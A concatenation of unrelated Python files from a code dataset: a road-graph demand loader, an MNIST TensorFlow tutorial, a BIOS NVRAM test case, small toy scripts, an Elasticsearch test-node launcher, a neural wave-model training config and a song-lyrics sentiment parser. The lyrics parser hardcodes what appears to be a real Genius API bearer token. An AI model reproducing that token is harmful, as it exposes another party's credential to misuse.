1.12),\n (3, 1, 0.15),\n (3, 2, 0.01),\n ]\n\n return G, pos, demands\n\n# haversine\ndef haversine(loc1, loc2):\n \"\"\"\n Calculate the great circle distance between two points \n on the earth (specified in decimal degrees)\n \"\"\"\n lat1, lon1 = loc1\n lat2, lon2 = loc2\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n m = 6367 * c * 1000.0\n return m\n\n#from machinelearningmaster.com\ndef get_neighbor(training_set, test_instance, k):\n distances = []\n for label1, loc1 in training_set.iteritems():\n dist = haversine(test_instance, loc1)\n distances.append((label1, dist))\n distances.sort(key = operator.itemgetter(1))\n neighbors = []\n for x in range(k):\n neighbors.append(distances[x][0])\n return neighbors\n\n\ndef create_manhattan_scenario(load='high', reduced = False):\n #load graph, get positions\n if reduced:\n with open('assets/manhattan_road_netx_constrained.json','r') as data_file: \n road_graph = json_graph.node_link_graph(json.load(data_file))\n else:\n with open('assets/manhattan_road_netx.json','r') as data_file: \n road_graph = json_graph.node_link_graph(json.load(data_file))\n\n pos = OrderedDict({node: (road_graph.node[node][\"latlon\"][1],\n road_graph.node[node][\"latlon\"][0]) for node in road_graph.nodes()})\n \n with open('assets/manhattan_demands_50.json','r') as f:\n raw_demands = json.loads(f.read())\n \n #implement 1-NN, get relationship of source, sink -> source_node, sink_node\n station_to_node = {}\n\n for station, loc in raw_demands['stations'].iteritems():\n node = get_neighbor(pos, (loc[1], loc[0]), 1)[0]\n station_to_node[station] = road_graph.nodes().index(node)\n\n\n #create demands list of tuples using the 1-NN relationship and the demands\n demands = {}\n\n for scenario in raw_demands['scenarios']:\n demands[scenario] = {}\n for demand in raw_demands['scenarios'][scenario]:\n src = station_to_node[demand[0]]\n snk = station_to_node[demand[1]]\n if src in demands[scenario]:\n if snk in demands[scenario][src]:\n demands[scenario][src] += demand[2]\n else:\n demands[scenario][src][snk] = demand[2]\n else:\n demands[scenario][src] = {}\n demands[scenario][src][snk] = demand[2]\n dems = []\n for src, sinks in demands[scenario].iteritems():\n for snk, d in sinks.iteritems():\n dems.append((src,snk,d))\n demands[scenario] = dems\n \n return road_graph, pos, demands[load]\n \n \n","sub_path":"notebooks/amod/test_cases.py","file_name":"test_cases.py","file_ext":"py","file_size_in_byte":7399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"181283157","text":"#coding:utf-8\n\"\"\"\nauthor: hxtkyne\nsource: https://github/hxtkyne\nreference: http://adventuresinmachinelearning.com/python-tensorflow-tutorial/\nresult: 0.9787 with epochs=20\ndate: 2018-03-06\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n# simple test on a=(b+c)*(c+2)\ndef simple_test():\n\t# note: these constants, variables, operations and \n\t# computer graph are only created when initialisation are run\n\n\t# create constant\n\tconst = tf.constant(2.0, name='const')\n\n\t# create TF variables\n\tb_is_tensor = True\n\tif b_is_tensor:\n\t\t# note we should specilize the variable type in placeholder\n\t\tb = tf.placeholder(tf.float32, [None,1], name='b')\n\telse:\n\t\tb = tf.Variable(2.0, name='b')\n\tc = tf.Variable(1.0, name='c')\n\n\t# create operations, a,d,e are operations, not variables\n\td = tf.add(b,c, name='d')\n\te = tf.add(c, const, name='e')\n\ta = tf.multiply(d, e, name='a')\n\n\t# initialisation\n\tinit_op = tf.global_variables_initializer()\n\n\t# start session to run operation above\n\twith tf.Session() as sess:\n\t\tsess.run(init_op)\n\t\t# no need for runing d,e operations\n\t\tif b_is_tensor:\n\t\t\t# feed_dict for placeholder variables\n\t\t\ta_out = sess.run(a, feed_dict={b: np.arange(0,10)[:, np.newaxis]})\n\t\telse:\n\t\t\ta_out = sess.run(a)\n\t\tprint(\"Variable a is {}\".format(a_out))\n\ndef ann_on_mnist():\n\t# load data\n\tmnist = input_data.read_data_sets(\"../data/MNIST_data/\", one_hot=True)\n\n\t# setting parameters for network\n\tlearning_rate = 0.5\n\tepochs = 20\n\tbatch_size = 100\n\n\t# input images and labels\n\tx = tf.placeholder(tf.float32, [None, 784], name='x')\n\ty = tf.placeholder(tf.float32, [None, 10], name='y')\n\n\t# weights and bias\n\tW1 = tf.Variable(tf.random_normal([784,300], stddev=0.03), name='W1')\n\tb1 = tf.Variable(tf.random_normal([300]), name='b1')\n\tW2 = tf.Variable(tf.random_normal([300,10], stddev=0.03), name='W2')\n\tb2 = tf.Variable(tf.random_normal([10]), name='b2')\n\n\t# operations for layers, not the dimensions\n\thidden_out = tf.add(tf.matmul(x, W1), b1)\n\thidden_out = tf.nn.relu(hidden_out)\n\n\ty_ = tf.nn.softmax(tf.add(tf.matmul(hidden_out, W2), b2))\n\n\t# -y*log(y_)-(1-y)*log(1-y_)\n\t# if y_ = 0 or 1, then log(0) appear in loss function, stop training\n\t# so need clip\n\ty_clipped = tf.clip_by_value(y_, 1e-10, 0.9999)\n\n\t# define cross entropy\n\tcross_entropy = -tf.reduce_mean(tf.reduce_sum(y * tf.log(y_clipped)\n\t\t+ (1 - y)*tf.log(1 - y_clipped), axis = 1))\n\n\t# define optimizer\n\toptimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(cross_entropy)\n\n\t# init_op\n\tinit_op = tf.global_variables_initializer()\n\n\t# define accuracy assessment operation\n\tcorrect_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_, 1))\n\taccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n\t# start a session\n\twith tf.Session() as sess:\n\t\tsess.run(init_op)\n\t\ttotal_batch = int(len(mnist.train.labels) / batch_size)\n\t\tfor epoch in range(epochs):\n\t\t\tavg_cost = 0\n\t\t\tfor i in range(total_batch):\n\t\t\t\tbatch_x, batch_y = mnist.train.next_batch(batch_size=batch_size)\n\t\t\t\t_, c = sess.run([optimizer, cross_entropy], feed_dict={x: batch_x, y: batch_y})\n\t\t\t\tavg_cost += c/total_batch\n\t\t\tprint(\"Epoch: \", (epoch+1), \"Cost:\", \"{:.3f}\".format(avg_cost))\n\t\tprint(sess.run(accuracy, feed_dict={x:mnist.test.images, y:mnist.test.labels}))\n\n\n\nif __name__ == '__main__':\n\t#simple_test()\n\tann_on_mnist()\n","sub_path":"mnist_with_tensorflow.py","file_name":"mnist_with_tensorflow.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"121416524","text":"from case.CBaseCase import *\n\nclass T2408_uefi_ReInitNvramTableWhenSysTypeChange(CBaseCase):\n '''\n **************************************************************\n [Purpose ]: Checks that NVRAM Map Table re-inits when the system type\n changes.\n [Author ]: Celine.Xu@emc.com\n [Sprint ]: ATOM 2.0.6\n [Tickets ]: ATOM-1482\n [Platform]: Europa, Oberon, Hyperion\n [Type ]: Auto\n [History ]:\n - Jane Jin 3/21/2014\n First edition.\n - Chris Campetti 12/19/2014\n Updated case to match recent Atom conventions and fixed default\n NVRAM values.\n **************************************************************\n '''\n def __init__(self):\n CBaseCase.__init__(self, self.__class__.__name__)\n self.__restore_system_type = False\n\n def config(self):\n sp = self.enclosure.sp\n \n #Change to Manufacturing Mode if needed\n self.log('INFO', 'Getting current system type')\n str_system_type = sp.get_system_type()\n if str_system_type == '':\n raise Exception('FAIL', 'Error getting system type')\n\n if str_system_type != 'Manufacturing Mode':\n self.log('INFO', 'System type is not Manufacturing Mode, '\\\n 'switching to Manufacturing Mode')\n self.__switch_system_type('Manufacturing Mode') \n\n def test(self):\n nvram = self.enclosure.sp.nvram\n sp = self.enclosure.sp\n \n #Check that table is inititally the default\n b_ret = nvram.check_nvram_map_table_in_debugger()\n if not b_ret:\n str_msg = 'Initial NVRAM Map Table is not the default'\n raise Exception('FAIL', str_msg) \n int_ret = sp.obj_post.exit_debugger()\n if int_ret != 0:\n raise Exception('FAIL', 'Failed to exit POST debugger')\n lst_new_entry = ['17300000', '00300000', 'feedface']\n self.log('INFO', 'Adding new NVRAM Map Table entry {}'.format(\n lst_new_entry))\n int_ret = nvram.add_nvram_map_entry('10054', lst_new_entry)\n if int_ret != 0:\n raise Exception('FAIL', 'Failed to add new NVRAM Map Table entry')\n\n #Confirm the table changed from the default\n b_ret = nvram.check_nvram_map_table_in_debugger()\n if b_ret:\n str_msg = 'Initial NVRAM Map Table did not change after adding'\\\n 'an entry'\n raise Exception('FAIL', str_msg) \n int_ret = sp.obj_post.exit_debugger()\n if int_ret != 0:\n raise Exception('FAIL', 'Failed to exit POST debugger')\n\n #Switch system type\n str_type = sp.str_product_type\n if str_type == '':\n errmsg = 'Don\\'t know the product system type for %s.' \\\n % self.str_platform\n raise Exception('BLOCK', errmsg)\n self.__switch_system_type(str_type)\n self.__restore_system_type = True\n\n #Check that table is back to default\n b_ret = nvram.check_nvram_map_table_in_debugger()\n if not b_ret:\n str_msg = 'Initial NVRAM Map Table is not the default'\n raise Exception('FAIL', str_msg) \n int_ret = sp.obj_post.exit_debugger()\n if int_ret != 0:\n raise Exception('FAIL', 'Failed to exit POST debugger')\n\n def deconfig(self):\n if self.__restore_system_type:\n self.log('INFO', 'Restoring system type to Manufacturing Mode')\n self.__switch_system_type('Manufacturing Mode')\n\n def __switch_system_type(self, str_system_type):\n sp = self.enclosure.sp\n sp.switch_system_type(str_system_type)\n self.config_bmc_console_for_sp(sp)\n","sub_path":"case/regression/bios/T2408_uefi_ReInitNvramTableWhenSysTypeChange.py","file_name":"T2408_uefi_ReInitNvramTableWhenSysTypeChange.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"486507454","text":"# random number program\n# User select number in range 1 to 100\n# AI should guess the number\n# User will lead AI to the correct answer by providing more or less\n#\n# used \"Binary search algorithm\" https://en.wikipedia.org/wiki/Binary_search_algorithm\n#\n\nimport random\n\ndef computer_guess(num):\n low = 1\n high = 100\n guess = random.randint(low, high)\n while guess != num:\n print(\"The computer takes a guess \", guess)\n if guess > num:\n high = guess\n print(\"High is {} and low is {}\".format(high, low))\n elif guess < num:\n low = guess + 1\n print(\"Low is {} and high is {}\".format(low, high))\n guess = (low + high) // 2\n\n print(\"The computer guessed\", guess, \"and it was correct!\")\n\n\ndef main():\n num = int(input(\"Enter a number: \"))\n if num < 1 or num > 100:\n print(\"Must be in range [1, 100]\")\n else:\n computer_guess(num)\n\nif __name__ == '__main__':\n main()","sub_path":"michael_dowson/random_number_guess_by_AI.py","file_name":"random_number_guess_by_AI.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"387813513","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 11 20:31:08 2020\n\n@author: 86158\n\"\"\"\n#import n, start the loop\ntemp=input('please input a positive integer:')\nn = int(temp)\nprint(n,\"-\")\nwhile n>1 :\n#judge n even or odd, give different operations\n #if the number is even\n if n%2==0:\n n=n/2\n print(n,\"-\")\n #if the number is odd\n else:\n n=n*3+1\n print(n,\"-\")\n\n ","sub_path":"practical5/collatz.py","file_name":"collatz.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"564587816","text":"import logging\nimport os\nimport os.path\nimport shutil\nimport subprocess\nimport tempfile\n\n\nCONF = \"\"\"\\\ncluster.name: \"{cluster_name}\"\nnode.name: \"{node_name}\"\nindex.number_of_shards: 1\nindex.number_of_replicas: 0\nnetwork.host: \"{host}\"\nhttp.port: {port}\ntransport.tcp.port: {tport}\ndiscovery.zen.ping.multicast.enabled: false\ndiscovery.zen.ping.unicast.hosts: \"{hosts}\"\npath.conf: \"{config_path}\"\npath.work: \"{working_path}\"\npath.plugins: \"{working_path}\"\npath.data: \"{data_path}\"\npath.logs: \"{log_path}\"\n\"\"\"\n\nLOG_CONF = \"\"\"\\\nrootLogger: INFO, console, file\n\nlogger:\n action: DEBUG\n\nappender:\n console:\n type: \"console\"\n layout:\n type: \"consolePattern\"\n conversionPattern: \"[%d{ISO8601}][%-5p][%-25c] %m%n\"\n\n file:\n type: dailyRollingFile\n file: \"${path.logs}/${cluster.name}.log\"\n datePattern: \"'.'yyyy-MM-dd\"\n layout:\n type: \"pattern\"\n conversionPattern: \"[%d{ISO8601}][%-5p][%-25c] %m%n\"\n\"\"\"\n\n\nclass Node(object):\n \"\"\"Start a new ElasticSearch node, isolated in a temporary\n directory and part of a cluster.\n \"\"\"\n\n def __init__(self, cluster, name, port, trans_port):\n \"\"\"Create a new cluster node.\n\n :param cluster: A cluster instance which this node is a part of.\n :type cluster: :class:`~pyelastictest.cluster.Cluster`\n :param name: The name of the node.\n :type name: str\n :param port: The public client port.\n :type port: int\n :param trans_port: The internal cluster communication port.\n :type trans_port: int\n \"\"\"\n self.cluster = cluster\n self.working_path = tempfile.mkdtemp(dir=cluster.working_path)\n self.name = name\n self.port = port\n self.trans_port = trans_port\n self.url = 'http://%s:%s' % (self.cluster.ip, port)\n self.running = False\n self.process = None\n self.logger = logging.getLogger(self.name)\n self.stdout = None\n self.stderr = None\n\n def start(self):\n \"\"\"Start the node as a subprocess in a temporary directory.\n \"\"\"\n install_path = self.cluster.install_path\n bin_path = os.path.join(self.working_path, \"bin\")\n config_path = os.path.join(self.working_path, \"config\")\n conf_path = os.path.join(config_path, \"elasticsearch.yml\")\n log_path = os.path.join(self.working_path, \"logs\")\n log_conf_path = os.path.join(config_path, \"logging.yml\")\n data_path = os.path.join(self.working_path, \"data\")\n\n # create temporary directory structure\n for path in (bin_path, config_path, log_path, data_path):\n if not os.path.exists(path):\n os.mkdir(path)\n\n # copy ES startup scripts\n es_bin_dir = os.path.join(install_path, 'bin')\n shutil.copy(os.path.join(es_bin_dir, 'elasticsearch'), bin_path)\n shutil.copy(os.path.join(es_bin_dir, 'elasticsearch.in.sh'), bin_path)\n\n # write configuration file\n with open(conf_path, \"w\") as config:\n config.write(CONF.format(\n cluster_name=self.cluster.name,\n node_name=self.name,\n host=self.cluster.ip,\n port=self.port,\n tport=self.trans_port,\n hosts=','.join(self.cluster.hosts),\n working_path=self.working_path,\n config_path=config_path,\n data_path=data_path,\n log_path=log_path,\n ))\n\n # write log file\n with open(log_conf_path, \"w\") as config:\n config.write(LOG_CONF)\n\n # create stdout/err files\n self.stdout = tempfile.TemporaryFile(\n suffix='stdout', dir=self.working_path)\n self.stderr = tempfile.TemporaryFile(\n suffix='stderr', dir=self.working_path)\n\n # setup environment, copy from base process\n environ = os.environ.copy()\n # configure explicit ES_INCLUDE, to prevent fallback to\n # system-wide locations like /usr/share, /usr/local/, ...\n environ['ES_INCLUDE'] = os.path.join(bin_path, 'elasticsearch.in.sh')\n lib_dir = os.path.join(install_path, 'lib')\n # let the process find our jar files first\n path = '{dir}/elasticsearch-*:{dir}/*:{dir}/sigar/*:$ES_CLASSPATH'\n environ['ES_CLASSPATH'] = path.format(dir=lib_dir)\n # reduce JVM startup time\n environ['ES_MIN_MEM'] = '64m'\n environ['JAVA_OPTS'] = \\\n '-client -XX:+TieredCompilation -XX:TieredStopAtLevel=1'\n\n self.process = subprocess.Popen(\n args=[bin_path + \"/elasticsearch\", \"-f\",\n \"-Des.config=\" + conf_path],\n stdout=self.stdout,\n stderr=self.stderr,\n env=environ\n )\n self.running = True\n\n def stop(self):\n \"\"\"Stop the node and terminate the subprocess.\n \"\"\"\n if self.running:\n # dump log fies to logging module\n self.logger.debug('### Begin captured stdout ###')\n self.stdout.seek(0)\n for line in self.stdout.readlines():\n self.logger.debug(line)\n self.logger.debug('### End captured stdout ###')\n self.logger.debug('### Begin captured stderr ###')\n self.stderr.seek(0)\n for line in self.stderr.readlines():\n self.logger.debug(line)\n self.logger.debug('### End captured stderr ###')\n try:\n self.process.terminate()\n except OSError:\n # might not have been running\n pass\n else:\n self.process.wait()\n self.running = False\n","sub_path":"pyelastictest/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":5650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"126867447","text":"import sys\nimport json\n\nsys_path = json.load(open('../../../../../paths.json',))['sys_path']\n\nsys.path.append(sys_path)\n\nfrom loss import *\nfrom multi_scale import MultiScale\nfrom dataloader import *\nfrom BaseModel import BaseModel\n\nimport torch.optim as optim\n\nif torch.cuda.is_available():\n device = 'cuda:0'\nelse:\n device = 'cpu'\n\n##################\n# # # Config # # # \n##################\n\nepochs = 500\nbatch_size = 4\n\n# Data\ndata_dir = '../../../../Training_Data/Moseley_EARTH/'\ndata_csv = '../../../../Training_Data/Moseley_Earth_AR.csv'\nvelocity_field = '../../../../Training_Data/Velocity_Field_1.npy'\n\n# Paths\nsave_dir = '../results/'\nsave_pt = f'AR_PINN_MSE_E{epochs}.pt'\nsave_txt = f'AR_PINN_MSE_E{epochs}.yml'\n\ncheckpoint_path = f'checkpoint_AR_PINN_MSE_E{epochs}.pt'\n\n# # # Data\ntraining_data = dataset(data_dir,data_csv,velocity_field=velocity_field)\ntrain_loader = DataLoader(training_data, batch_size=batch_size, shuffle=True)\n\nnet = MultiScale(in_channels=5)\n\n# Optimizer & Scheduler\noptimizer = optim.Adam(net.parameters(), lr=0.00001, weight_decay=1e-6)\n\nclass MultiScaleModel(BaseModel):\n def __init__(self, net, N,T, opt=None, sched=None, logger=None, print_progress=True, device='cuda:0'):\n \"\"\"\n\n \"\"\"\n super().__init__(net, opt, sched, logger, print_progress, device)\n\n self.loss_fn = PINNLoss_MSE(dh=5, dt=0.002, c=torch.Tensor(training_data.velocity_field_values)[None,None].to(device), device='cuda:0')\n\n self.T = T\n self.N = N\n\n def forward_loss(self, data):\n \"\"\"\n\n \"\"\"\n input = data['wave_input'].transpose(2, 1)\n input = input.to(self.device)\n\n loss_epoch = 0\n\n for i in range(self.N):\n loss = 0\n self.optimizer.zero_grad()\n\n for j in range(0,self.T):\n \n input_4 = input[:,:,::4,::4]\n input_2 = input[:,:,::2,::2]\n input_1 = input\n\n output = self.net(input_4,input_2,input_1) # 1 x 5 x 300 x 300 --> 1 x 1 x 300 x 300\n\n pinn = torch.cat((input,output),axis=1) # 1 x 6 x 300 x 300 \n\n loss = loss + self.loss_fn(inputs=pinn)\n\n input = torch.cat((pinn[:,1:4,:,:],pinn[:,5:6,:,:],pinn[:,4:5,:,:]),dim=1) # Three previous timesteps + Last predicted timestep + Velocity field --> # 1 x 5 x 300 x 300 \n\n #print('N =',i)\n\n loss_epoch = loss_epoch + loss\n\n loss.backward()\n self.optimizer.step()\n input = input.detach()\n\n return torch.tensor(0., requires_grad=True), {'Loss':loss_epoch, 'Loss AR PINN MSE':loss_epoch} \n\n# Create the model\nmodel = MultiScaleModel(net=net, N=50,T=4, opt=optimizer, sched=None, logger=None, print_progress=True, device=device)\n\n# Train the model\nmodel.train(epochs, train_loader, checkpoint_path=checkpoint_path, checkpoint_freq=5, save_best=None)\n\n# Save\n#model.save_best(export_path=save_dir + save_pt_best)\nmodel.save(export_path=save_dir + save_pt)\nmodel.save_outputs(export_path=save_dir + save_txt)","sub_path":"DNN_Test/Layered/Training/multiscale/config/multiscale_AR_PINN_MSE.py","file_name":"multiscale_AR_PINN_MSE.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"255821763","text":"import time\nfrom os import mkdir\nfrom os.path import basename, splitext, join, exists\nimport random\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\nimport deconvolutional_net as net\nimport cv2 as cv\nimport torch.nn as nn\nfrom torchvision.utils import save_image\nfrom utils import test_transform\nfrom PIL import Image\n\n\nresolution = 512\namplitude =10.\nlayer = 4\n\ndecoder_path = \"models/vgg_deconv.pth\"\nvgg_path = \"models/vgg_normalised.pth\"\nref_path = \"encodings/ref/\"\ncontent_dir = \"input/content/\"\n\nencoding_dir = \"encodings\"\noutput_dir = join(\"output\", \"channel_activations_noise_norm\")\nif not exists(output_dir):\n mkdir(output_dir)\n\ntorch.cuda.set_device(0)\ndecoder = net.decoder\nvgg = net.vgg\n\nvgg.load_state_dict(torch.load(vgg_path))\nvgg = nn.Sequential(*list(vgg.children())[:31])\ndecoder.load_state_dict(torch.load(decoder_path))\nnetwork = net.Net(vgg, decoder)\nnetwork.cuda()\n\nimage_name = \"avril.jpg\"\nimage_path = join(content_dir, image_name)\nimg = cv.imread(image_path)\nchannels = img.shape[2]\nif channels == 1:\n img = cv.cvtColor(img, cv.COLOR_GRAY2RGB)\nelif channels == 4:\n img = cv.cvtColor(img, cv.COLOR_BGRA2RGB)\nelse:\n print(\"gm\")\n #img = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n\n\n\nimage_tf = test_transform((resolution,resolution), False)\n\n\ninput_tensor = image_tf(Image.fromarray(img))\ninput_tensor = input_tensor.cuda()\ninput_variable = Variable(input_tensor.unsqueeze(0), volatile=True)\n\n\n\n# cv.putText(frame, \"{}\".format(neuron_index), (15,15), cv.FONT_HERSHEY_PLAIN, 1.,(1.,1.,1.))\ncv.imshow(\"Input\", img)\ncv.waitKey(0)\n\n\nreference_input = join(ref_path, \"reference_encoding_{}_relu{}.npy\".format(resolution, layer))\nreference_input = np.load(reference_input)\nnum_neurons = reference_input.shape[1]\n\n\n\nfor activated_neuron_index in range(num_neurons):\n\n neuron_index = activated_neuron_index\n\n t = time.time()\n\n\n image = network.mini_pass(input_variable)\n #image = network.test_pass(input_variable)\n frame = image.cpu().data.numpy()[0]\n minimum = np.min(frame)\n maximum = np.max(frame)\n frame = (frame -minimum)/(maximum - minimum)\n\n frame = np.transpose(frame, (1,2,0))\n\n\n t = time.time() - t\n print(\"Took {} seconds to extract encoding\".format(t))\n frame = cv.cvtColor(frame, cv.COLOR_RGB2BGR)\n cv.putText(frame, \"{}\".format(neuron_index), (15,15), cv.FONT_HERSHEY_PLAIN, 1.,(1.,1.,1.))\n cv.imshow(\"Neuron activation\", frame)\n cv.waitKey(33)\n out_file = \"layer4_channel{}.png\".format(str(activated_neuron_index).zfill(3))\n out_path = join(output_dir, out_file)\n #save_image(image,out_path, normalize=True)\n #cv.imwrite(out_path, frame)\n del image, frame\n torch.cuda.empty_cache()\n","sub_path":"deconvolution_test.py","file_name":"deconvolution_test.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"36652781","text":"from collections import Counter\nimport re\nfrom statistics import mean\n\nimport nltk\nfrom nltk.corpus import wordnet\nfrom requests_html import HTMLSession\nfrom textblob import TextBlob\nfrom textblob import Word\n\nfrom lyrics_parser.helpers.helpers import STOP_WORDS\n\n\nclass Parser:\n \"\"\"\n Build up a dictionary of information about songs by an artist\n and process that information.\n \"\"\"\n def __init__(self, songs):\n # Set authorization header in order to use Genius API\n # (https://docs.genius.com/)\n self.headers = {\n \"Authorization\": \"Bearer {}\".format(\n \"umuTypKle_tO2TrPvkM6FDqDiV1LIevm8QvHd92fJ4o-2Ui0h2yfnsyNwxeY9cUa\"\n )\n }\n\n self.songs = songs\n\n def _get_lyrics_and_title(self, url):\n session = HTMLSession()\n session.headers = self.headers\n response = session.get(url)\n\n title = response.html.find(\n \".header_with_cover_art-primary_info-title\",\n first=True\n ).text\n\n lyrics = response.html.find(\".lyrics\", first=True).text\n\n return title, lyrics\n\n def _format_word(self, word):\n \"\"\"\n Lemmatize (https://en.wikipedia.org/wiki/Lemma_(morphology)),\n capitalize, and remove punctuation (other than apostrophes).\n \"\"\"\n punctuation_stripped = re.sub(r\"[^\\w\\d'\\s]+\", '', word)\n lemmatized = Word(punctuation_stripped).lemmatize()\n capitalized = lemmatized.capitalize()\n\n return capitalized\n\n def _remove_common_words(self, lyrics):\n \"\"\"\n Exclude common words by comparing lyrics to a list of Stop Words\n (https://en.wikipedia.org/wiki/Stop_words)\n \"\"\"\n return [word for word in lyrics.split() if word.lower() not in STOP_WORDS]\n\n def _prepare_lyrics(self, lyrics):\n \"\"\"\n Remove common English words from lyrics, remove blank items,\n and format the remaining words.\n \"\"\"\n uncommon_words = self._remove_common_words(lyrics)\n processed_string = list(map(\n self._format_word,\n uncommon_words\n ))\n\n strip_blanks = list(\n filter(lambda x : x.strip() != \"\", processed_string)\n )\n\n return strip_blanks\n\n def _analyse_sentiment(self, lyrics):\n \"\"\" Analyse the overall positivty/negativity and\n subjectivity/objectivity of the lyrics in a song.\n\n Break the lyrics down into TextBlob Sentence objects. Create a list\n of Sentiments for those Sentences. Return the mean polarity and\n subjectivity of the song.\n \"\"\"\n sentences = TextBlob(lyrics).sentences\n sentiments = [sentence.sentiment for sentence in sentences]\n\n mean_polarity = mean(\n [sentiment.polarity for sentiment in sentiments]\n )\n\n mean_subjectivity = mean(\n [sentiment.subjectivity for sentiment in sentiments]\n )\n\n return mean_polarity, mean_subjectivity\n\n def _analyse_themes(self, lyrics):\n \"\"\" Very roughly establish what concepts are commonly referred to\n by this artist.\n\n Create a list of Synsets (http://www.nltk.org/howto/wordnet.html),\n find the most common hypernyms (https://en.wikipedia.org/wiki/Hyponymy_and_hypernymy),\n count them and return the 5 most common.\n \"\"\"\n synsets = []\n for word in lyrics:\n synsets.extend(wordnet.synsets(word))\n\n hypernyms = []\n for synset in synsets:\n hypernyms.extend(synset.hypernyms())\n\n # Return the name of the first lemma (https://en.wikipedia.org/wiki/Lemma_(morphology))\n # of each hypernym (so we can deal with English words)\n hypernym_lemmas = [\n x.lemma_names()[0].replace(\"_\", \" \").capitalize() for x in hypernyms\n ]\n\n counter = Counter(hypernym_lemmas)\n return counter.most_common(3)\n\n def _get_word_frequencies(self, words):\n return Counter(words)\n\n def _get_mean_polarity(self):\n \"\"\"\n Calculate the mean polarity (positivity/negativity)\n of all the songs in the dictionary.\n \"\"\"\n polarities = []\n for key, value in self.songs.items():\n if value[\"sentiment\"][0] != '':\n polarities.append(float(value[\"sentiment\"][0]))\n\n if len(polarities) > 0:\n return mean(polarities)\n else:\n return None\n\n def _get_mean_subjectivity(self):\n \"\"\"\n Calculate the mean subjectivity of all the songs in the dictionary.\n \"\"\"\n subjectivities = []\n for key, value in self.songs.items():\n if value[\"sentiment\"][1] != '':\n subjectivities.append(float(value[\"sentiment\"][1]))\n\n if len(subjectivities) > 0:\n return mean(subjectivities)\n else:\n return None\n\n def add_song(self, url):\n \"\"\"\n Build a dictionary of information about a song from a given url.\n\n Add this dictionary to the dictionary of songs.\n\n :param url: The URL of the song\n \"\"\"\n title, lyrics = self._get_lyrics_and_title(url)\n words = self._prepare_lyrics(lyrics)\n\n self.songs[title] = {\n \"word frequencies\": self._get_word_frequencies(words),\n \"lyrics\": lyrics,\n \"sentiment\": self._analyse_sentiment(lyrics),\n \"themes\": self._analyse_themes(words)\n }\n\n def process_all_lyrics(self):\n \"\"\" Calculate general information about the songs.\n\n Sum all of the word frequencies from each song. Get the mean\n polarity and subjectivity of the songs. Sum all of the common\n themes and again count them.\n\n :return: A dictionary containing the above information\n \"\"\"\n counter = Counter([])\n for key, value in self.songs.items():\n counter += value[\"word frequencies\"]\n\n polarity = self._get_mean_polarity()\n subjectivity = self._get_mean_subjectivity()\n\n themes = []\n for key, value in self.songs.items():\n # Build a list of strings from the counted themes\n string_only = [theme[0] for theme in value[\"themes\"]]\n themes.extend(string_only)\n\n data = {\n \"word frequencies\": counter.most_common(10),\n \"polarity\": polarity,\n \"subjectivity\": subjectivity,\n \"theme frequencies\": Counter(themes).most_common(5)\n }\n\n return data\n","sub_path":"lyrics_parser/helpers/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":6504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"574009576","text":"from sklearn.datasets import make_classification\nimport sklearn.model_selection\nfrom AutoSKLearn_test import AutoSKLearn_comparison\nfrom TPOT_test import TPOT_comparison\n#from randomized_TPOT_test import randomized_TPOT_comparison\nfrom baseline_test import baseline_comparison\n\nimport json\nimport os\nimport datetime\n\n\ndef main():\n params = dict()\n\n # Params simulation\n params['n_cores'] = 4\n params['total_time'] = 60\n params['n_simulations'] = 5\n\n # Training test split\n params['test_size'] = 0.9\n\n # Params data generation\n params['n_samples'] = 50000\n params['n_features'] = 50\n params['n_informative'] = 15\n params['n_classes'] = 2\n params['n_redundant'] = 10\n params['n_clusters_per_class'] = 5\n params['flip_y'] = 0.05\n\n output_path = \"/home/thomas/results_simulation/results_\" + datetime.datetime.now().strftime(\"%Y_%m_%d_%H_%M\")\n os.mkdir(output_path)\n\n for i in range(params['n_simulations']):\n params['random_state'] = i + 1\n print(params)\n X, y = make_classification(n_samples=params['n_samples'],\n n_features=params['n_features'],\n n_informative=params['n_informative'],\n n_classes=params['n_classes'],\n n_redundant=params['n_redundant'],\n n_clusters_per_class=params['n_clusters_per_class'],\n random_state=params['random_state'],\n flip_y=params['flip_y'])\n\n X_train, X_test, y_train, y_test = \\\n sklearn.model_selection.train_test_split(X, y, test_size=params['test_size'],\n random_state=params['random_state'])\n\n # Testing auto sklearn\n test_autosklearn = AutoSKLearn_comparison(X_train=X_train, X_test=X_test,\n y_train=y_train, y_test=y_test,\n total_time=params['total_time'],\n n_cores=params['n_cores'])\n\n results_autosklearn = test_autosklearn.sort_values(by=\"Cross-Validation accuracy\", ascending=False)\n results_autosklearn.to_csv(output_path + \"/autosklearn_results_\" + str(i) + \".csv\")\n\n # Testing TPOT\n 